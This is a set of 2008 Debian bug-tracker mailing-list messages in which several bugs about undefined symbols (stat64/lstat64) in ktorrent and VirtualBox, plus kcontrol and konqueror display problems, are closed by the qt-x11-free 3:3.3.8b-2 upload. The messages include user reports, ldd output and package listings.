  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-

Bug#465300: marked as done (kcontrol: font settings not avaible)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding kcontrol: font settings not avaible
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: kcontrol
Version: 4:3.5.8.dfsg.1-7
Severity: normal

Since 3-4 days, the font settings in kcontrol aren't avaible anymore. 
When I click on it (kcontrol / appearance & themes / fonts), it just 
shows me menu entries of "apperance & themes" on the right, just like 
when I click on "appearance & themes" on the menu in the left. All other 
menu entries are working. Furthermore, when it worked, I couldn't chose 
"sub-pixel-rendering" and had to manually edit the .fonts.conf and 
change "none" to "rgb" to enable sub-pixel-rendering.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-486
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages kcontrol depends on:
ii  kdebase-data   4:3.5.8.dfsg.1-7  shared data files for the KDE base
ii  kdelibs4c2a4:3.5.8.dfsg.1-7  core libraries and binaries for al
ii  kicker 4:3.5.8.dfsg.1-7  desktop panel for KDE
ii  libacl12.2.45-1  Access control list shared library
ii  libart-2.0-2   2.3.20-1  Library of functions for 2D graphi
ii  libattr1   1:2.4.39-1Extended attribute shared library
ii  libaudio2  1.9.1-1   Network Audio System - shared libr
ii  libc6  2.7-6 GNU C Library: Shared libraries
ii  libfam02.7.0-13.1Client library to control the FAM 
ii  libfontconfig1 2.5.0-2   generic font configuration library
ii  libfreetype6   2.3.5-1+b1FreeType 2 font engine, shared lib
ii  libgcc11:4.3-20080202-1  GCC support library
ii  libgl1-mesa-glx [libgl 7.0.2-4   A free implementation of the OpenG
ii  libglu1-mesa [libglu1] 7.0.2-4   The OpenGL utility library (GLU)
ii  libice62:1.0.4-1 X11 Inter-Client Exchange library
ii  libidn11   1.1-1 GNU libidn library, implementation
ii  libjpeg62  6b-14 The Independent JPEG Group's JPEG 
ii  libpng12-0 1.2.15~beta5-3PNG library - runtime
ii  libqt3-mt  3:3.3.8b-1Qt GUI Library (Threaded runtime v
ii  libraw1394-8   1.3.0-2   library for direct access to IEEE 
ii  libsm6 2:1.0.3-1+b1  X11 Session Management library
ii  libssl0.9.80.9.8g-4  SSL shared libraries
ii  libstdc++6 4.3-20080202-1The GNU Standard C++ Library v3
ii  libusb-0.1-4   2:0.1.12-9userspace USB programming library
ii  libx11-6   2:1.0.3-7 X11 client-side library
ii  libxcursor11:1.1.9-1 X cursor management library
ii  libxext6   1:1.0.3-2 X11 miscellaneous extension librar
ii  libxft22.1.12-2  FreeType-based font drawing librar
ii  libxi6 2:1.1.3-1 X11 Input extension library
ii  libxinerama1   1:1.0.2-1 X11 Xinerama extension library
ii  libxrandr2 2:1.2.2-1 X11 RandR extension library
ii  libxrender11:0.9.4-1 X Rendering Extension client libra
ii  libxt6 1:1.0.5-3 X11 toolkit intrinsics library
ii  libxtst6   2:1.0.3-1 X11 Testing -- Resource extension 
ii  usbutils   0.73-5Linux USB utilities
ii  zlib1g 1:1.2.3.3.dfsg-11 compression library - runtime

Versions of packages kcontrol recommends:
ii  udev  0.114-2/dev/ and hotplug management daemo

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.d

Bug#465239: marked as done (virtualbox fails to start with "symbol lookup error: /usr/lib/virtualbox/VirtualBox: undefined symbol: stat64")

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding virtualbox fails to start with "symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64"
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: virtualbox-ose
Version: 1.5.4-dfsg-4
Severity: grave

--- Please enter the report below this line. ---
hi,

virtualbox fails to start on my system with the following error message:

[EMAIL PROTECTED]:~$ virtualbox 
/usr/lib/virtualbox/VirtualBox: symbol lookup
error: /usr/lib/virtualbox/VirtualBox: undefined symbol: stat64

cheers - fuddl


--- System information. ---
Architecture: amd64
Kernel:   Linux 2.6.24-1-amd64

Debian Release: lenny/sid
  500 unstablewww.debian-multimedia.org 
  500 unstableftp.de.debian.org 
1 experimentalftp.de.debian.org 

--- Package information. ---
Depends   (Version) | Installed
===-+-
adduser | 3.105
debconf   (>= 0.5)  | 1.5.19
 OR debconf-2.0 | 
libc6(>= 2.7-1) | 2.7-6
libgcc1 (>= 1:4.1.1-21) | 1:4.3-20080202-1
libgl1-mesa-glx | 7.0.2-4
 OR libgl1  | 
libglib2.0-0(>= 2.14.0) | 2.14.6-1
libidl0 | 0.8.9-0.1
libqt3-mt  (>= 3:3.3.7) | 3:3.3.8b-1
libsdl1.2debian   (>= 1.2.10-1) | 1.2.13-2
libstdc++6(>= 4.1.1-21) | 4.3-20080202-1
libx11-6| 2:1.0.3-7
libxalan110 | 1.10-3.1
libxcursor1  (>> 1.1.2) | 1:1.1.9-1
libxerces27 | 2.7.0-5
libxext6| 1:1.0.3-2
libxt6  | 1:1.0.5-3




signature.asc
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools_3.3.8b-2_amd64.deb
qt3-doc_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-doc_3.3.8b-2_all.deb
qt3-examples_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-examples_3.3.8b-2_all.deb
qt3-linguist_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-linguist_3.3.8b-2_amd64.deb
qt3-qtconfig_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-qtconfig_3.3.8b-2_amd64.deb



A summary of the changes between this version and the previous one is
at

Bug#465445: marked as done (ktorrent fails to start with unresolved symbol error)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding ktorrent fails to start with unresolved symbol error
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: ktorrent
Version: 2.2.5.dfsg.1-1
Severity: grave
Justification: renders package unusable

Ktorrent is not starting and fails with the following error

[EMAIL PROTECTED]:~$ ktorrent
ktorrent: symbol lookup error: /usr/lib/libktorrent-2.2.5.so: undefined
symbol: lstat64

[EMAIL PROTECTED]:~$ ldd /usr/lib/libktorrent-2.2.5.so
linux-gate.so.1 =>  (0xb7f36000)
libgmp.so.3 => /usr/lib/libgmp.so.3 (0xb7d53000)
libkparts.so.2 => /usr/lib/libkparts.so.2 (0xb7d0d000)
libqt-mt.so.3 => /usr/lib/libqt-mt.so.3 (0xb74ec000)
libkdecore.so.4 => /usr/lib/libkdecore.so.4 (0xb72a9000)
libkdeui.so.4 => /usr/lib/libkdeui.so.4 (0xb6fc)
libkio.so.4 => /usr/lib/libkio.so.4 (0xb6c76000)
libstdc++.so.6 => /usr/lib/libstdc++.so.6 (0xb6b8a000)
libm.so.6 => /lib/i686/cmov/libm.so.6 (0xb6b65000)
libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb6a18000)
libgcc_s.so.1 => /lib/libgcc_s.so.1 (0xb6a0a000)
libfontconfig.so.1 => /usr/lib/libfontconfig.so.1 (0xb69e1000)
libaudio.so.2 => /usr/lib/libaudio.so.2 (0xb69cb000)
libXt.so.6 => /usr/lib/libXt.so.6 (0xb697b000)
libjpeg.so.62 => /usr/lib/libjpeg.so.62 (0xb695c000)
libpng12.so.0 => /usr/lib/libpng12.so.0 (0xb6938000)
libz.so.1 => /usr/lib/libz.so.1 (0xb6923000)
libXi.so.6 => /usr/lib/libXi.so.6 (0xb691b000)
libXrender.so.1 => /usr/lib/libXrender.so.1 (0xb6913000)
libXrandr.so.2 => /usr/lib/libXrandr.so.2 (0xb690d000)
libXcursor.so.1 => /usr/lib/libXcursor.so.1 (0xb6904000)
libXinerama.so.1 => /usr/lib/libXinerama.so.1 (0xb6901000)
libXft.so.2 => /usr/lib/libXft.so.2 (0xb68ee000)
libfreetype.so.6 => /usr/lib/libfreetype.so.6 (0xb687f000)
libXext.so.6 => /usr/lib/libXext.so.6 (0xb6871000)
libX11.so.6 => /usr/lib/libX11.so.6 (0xb6785000)
libSM.so.6 => /usr/lib/libSM.so.6 (0xb677d000)
libICE.so.6 => /usr/lib/libICE.so.6 (0xb6766000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb6761000)
libpthread.so.0 => /lib/i686/cmov/libpthread.so.0 (0xb6749000)
libDCOP.so.4 => /usr/lib/libDCOP.so.4 (0xb6716000)
libresolv.so.2 => /lib/i686/cmov/libresolv.so.2 (0xb6703000)
libutil.so.1 => /lib/i686/cmov/libutil.so.1 (0xb66ff000)
libart_lgpl_2.so.2 => /usr/lib/libart_lgpl_2.so.2 (0xb66e8000)
libidn.so.11 => /usr/lib/libidn.so.11 (0xb66b7000)
libkdefx.so.4 => /usr/lib/libkdefx.so.4 (0xb668e000)
libkdesu.so.4 => /usr/lib/libkdesu.so.4 (0xb6678000)
libkwalletclient.so.1 => /usr/lib/libkwalletclient.so.1 (0xb6667000)
libfam.so.0 => /usr/lib/libfam.so.0 (0xb665e000)
libacl.so.1 => /lib/libacl.so.1 (0xb6657000)
libattr.so.1 => /lib/libattr.so.1 (0xb6653000)
/lib/ld-linux.so.2 (0x8000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0xb6633000)
libXfixes.so.3 => /usr/lib/libXfixes.so.3 (0xb662e000)
libXau.so.6 => /usr/lib/libXau.so.6 (0xb662a000)
libXdmcp.so.6 => /usr/lib/libXdmcp.so.6 (0xb6625000)


[EMAIL PROTECTED]:~$ dpkg -S /lib/i686/cmov/libc.so.6
libc6-i686: /lib/i686/cmov/libc.so.6

[EMAIL PROTECTED]:~$ dpkg -l libc6-i686 | grep ^ii
ii  libc6-i686 2.7-6
GNU C Library: Shared libraries [i686 optimized]

Please let me know if you need more information on this.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.21.1-thendral (SMP w/2 CPU cores; PREEMPT)
Locale: LANG=en_IN, LC_CTYPE=en_IN (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages ktorrent depends on:
ii  kdelibs4c2a 4:3.5.8.dfsg.1-7 core libraries and binaries for
al
ii  libavahi-client30.6.22-2 Avahi client library
ii  libavahi-common30.6.22-2 Avahi common library
ii  libavahi-qt3-1  0.6.22-2 Avahi Qt 3 integration library
ii  libc6   2.7-6GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  

Bug#465259: marked as done (Same problem with ktorrent)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding Same problem with ktorrent
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: libqt3-mt
Version: 3:3.3.8b-1
Severity: serious

--- Please enter the report below this line. ---

I've got the same problem with ktorrent:

ktorrent: symbol lookup error: /usr/lib/libktorrent-2.2.5.so: undefined 
symbol: lstat64

ii  ktorrent  2.2.5.dfsg.1-1

--- System information. ---
Architecture: amd64
Kernel:   Linux 2.6.24-1-amd64

Debian Release: lenny/sid
  500 unstablewww.debian-multimedia.org 
  500 unstableftp.fr.debian.org 
  500 kernel-dists-trunk kernel-archive.buildserver.net 

--- Package information. ---
Depends(Version) | Installed
-+-==
fontconfig   | 2.5.0-2
libaudio2| 1.9.1-1
libc6 (>= 2.7-1) | 2.7-6
libfontconfig1(>= 2.4.0) | 2.5.0-2
libfreetype6  (>= 2.3.5) | 2.3.5-1+b1
libgcc1  | 1:4.3-20080202-1
libice6 (>= 1:1.0.0) | 2:1.0.4-1
libjpeg62| 6b-14
libmng1 (>= 1.0.3-1) | 1.0.9-1
libpng12-0 (>= 1.2.13-4) | 1.2.15~beta5-3
libsm6   | 2:1.0.3-1+b1
libstdc++6 (>= 4.1.1-21) | 4.3-20080202-1
libx11-6 | 2:1.0.3-7
libxcursor1   (>> 1.1.2) | 1:1.1.9-1
libxext6 | 1:1.0.3-2
libxft2   (>> 2.1.1) | 2.1.12-2
libxi6   | 2:1.1.3-1
libxinerama1 | 1:1.0.2-1
libxrandr2  (>= 2:1.2.0) | 2:1.2.2-1
libxrender1  | 1:0.9.4-1
libxt6   | 1:1.0.5-3
zlib1g  (>= 1:1.1.4) | 1:1.2.3.3.dfsg-11



--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools_3.3.8b-2_amd64.deb
qt3-doc_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-doc_3.3.8b-2_all.deb
qt3-examples_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-examples_3.3.8b-2_all.deb
qt3-linguist_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-linguist_3.3.8b-2_amd64.deb
qt3-qtconfig_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-qtconfig_3.3.8b-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Tha

Bug#465046: marked as done (symbol lookup error)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding symbol lookup error
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: ktorrent
Version: 2.2.5.dfsg.1-1
Severity: serious

--- Please enter the report below this line. ---
Ktorrent is not started. I get in console:

ktorrent: symbol lookup error: /usr/lib/libktorrent-2.2.5.so: undefined 
symbol: lstat64

debian:~# ldd /usr/lib/libktorrent-2.2.5.so
linux-vdso.so.1 =>  (0x7fff2e9fd000)
libgmp.so.3 => /usr/lib/libgmp.so.3 (0x2af47c4fb000)
libkparts.so.2 => /usr/lib/libkparts.so.2 (0x2af47c73a000)
libqt-mt.so.3 => /usr/lib/libqt-mt.so.3 (0x2af47c996000)
libkdecore.so.4 => /usr/lib/libkdecore.so.4 (0x2af47d5d3000)
libkdeui.so.4 => /usr/lib/libkdeui.so.4 (0x2af47da88000)
libkio.so.4 => /usr/lib/libkio.so.4 (0x2af47e054000)
libstdc++.so.6 => /usr/lib/libstdc++.so.6 (0x2af47e64b000)
libm.so.6 => /lib/libm.so.6 (0x2af47e956000)
libc.so.6 => /lib/libc.so.6 (0x2af47ebd8000)
libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x2af47ef36000)
libfontconfig.so.1 => /usr/lib/libfontconfig.so.1 (0x2af47f14d000)
libaudio.so.2 => /usr/lib/libaudio.so.2 (0x2af47f37e000)
libXt.so.6 => /usr/lib/libXt.so.6 (0x2af47f596000)
libjpeg.so.62 => /usr/lib/libjpeg.so.62 (0x2af47f7f7000)
libpng12.so.0 => /usr/lib/libpng12.so.0 (0x2af47fa1a000)
libz.so.1 => /usr/lib/libz.so.1 (0x2af47fc3e000)
libXi.so.6 => /usr/lib/libXi.so.6 (0x2af47fe55000)
libXrender.so.1 => /usr/lib/libXrender.so.1 (0x2af48005f000)
libXrandr.so.2 => /usr/lib/libXrandr.so.2 (0x2af480268000)
libXcursor.so.1 => /usr/lib/libXcursor.so.1 (0x2af48046f000)
libXinerama.so.1 => /usr/lib/libXinerama.so.1 (0x2af48067a000)
libXft.so.2 => /usr/lib/libXft.so.2 (0x2af48077c000)
libfreetype.so.6 => /usr/lib/libfreetype.so.6 (0x2af48088f000)
libXext.so.6 => /usr/lib/libXext.so.6 (0x2af480b0d000)
libX11.so.6 => /usr/lib/libX11.so.6 (0x2af480c1e000)
libSM.so.6 => /usr/lib/libSM.so.6 (0x2af480e27000)
libICE.so.6 => /usr/lib/libICE.so.6 (0x2af48103)
libdl.so.2 => /lib/libdl.so.2 (0x2af48124b000)
libpthread.so.0 => /lib/libpthread.so.0 (0x2af48144f000)
libDCOP.so.4 => /usr/lib/libDCOP.so.4 (0x2af48166b000)
libresolv.so.2 => /lib/libresolv.so.2 (0x2af4818a7000)
libutil.so.1 => /lib/libutil.so.1 (0x2af481abc000)
libart_lgpl_2.so.2 => /usr/lib/libart_lgpl_2.so.2 (0x2af481cc)
libidn.so.11 => /usr/lib/libidn.so.11 (0x2af481ed7000)
libkdefx.so.4 => /usr/lib/libkdefx.so.4 (0x2af482109000)
libkdesu.so.4 => /usr/lib/libkdesu.so.4 (0x2af482335000)
libkwalletclient.so.1 => /usr/lib/libkwalletclient.so.1 
(0x2af48254c000)
libfam.so.0 => /usr/lib/libfam.so.0 (0x2af48275f000)
libacl.so.1 => /lib/libacl.so.1 (0x2af482968000)
libattr.so.1 => /lib/libattr.so.1 (0x2af482b6f000)
/lib64/ld-linux-x86-64.so.2 (0x4000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x2af482d73000)
libXfixes.so.3 => /usr/lib/libXfixes.so.3 (0x2af482f97000)
libXau.so.6 => /usr/lib/libXau.so.6 (0x2af48309c000)
libXdmcp.so.6 => /usr/lib/libXdmcp.so.6 (0x2af48319f000)

--- System information. ---
Architecture: amd64
Kernel:   Linux 2.6.23-1-amd64

Debian Release: lenny/sid
  500 unstableftp.yandex.ru 

--- Package information. ---
Depends  (Version) | Installed
==-+-==
kdelibs4c2a  (>= 4:3.5.8.dfsg.1-5) | 4:3.5.8.dfsg.1-7
libavahi-client3   (>= 0.6.13) | 0.6.22-2
libavahi-common3   (>= 0.6.10) | 0.6.22-2
libavahi-qt3-1  (>= 0.6.0) | 0.6.22-2
libc6   (>= 2.7-1) | 2.7-6
libgcc1(>= 1:4.1.1-21) | 1:4.3-20080202-1
libgeoip1  | 1.4.4.dfsg-1
libgmp3c2  | 2:4.2.2+dfsg-2
libqt3-mt (>= 3:3.3.7) | 3:3.3.8b-1
libstd

Bug#465407: marked as done (libqt3-mt: konqueror fails to display directory tree in the navigation area)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding libqt3-mt: konqueror fails to display directory tree in the 
navigation area
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: libqt3-mt
Version: 3:3.3.7-9
Severity: normal

Hi,

i am not sure, if exactly libqt3-mt causes the failure in konqueror. Maybe one 
of the other mentioned (downgraded) packages below cause this failure. 
Konqueror depends on libqt3-mt, so i decided to point the bugreport to this 
package. Hope that's right. 


Konqueror (in sid) fails to display the directory tree in the navigation area. 
This happens when konqueror is started with a mouseclick in kde. The 
failure does not occure when konqueror is started via command (e.g. $ konqueror 
/home) in a shell. Downgrading the following packages

libqt3-headers 3:3.3.8b-1 -> 3:3.3.7-9
libqt3-mt 3:3.3.8b-1 -> 3:3.3.7-9
libqt3-mt-dev 3:3.3.8b-1 -> 3:3.3.7-9
qt3-assistant 3:3.3.8b-1 -> 3:3.3.7-9
qt3-dev-tools 3:3.3.8b-1 -> 3:3.3.7-9

solve this problem.


If you need more information let me know.

Regards
Heiko


-- System Information:
Debian Release: lenny/sid
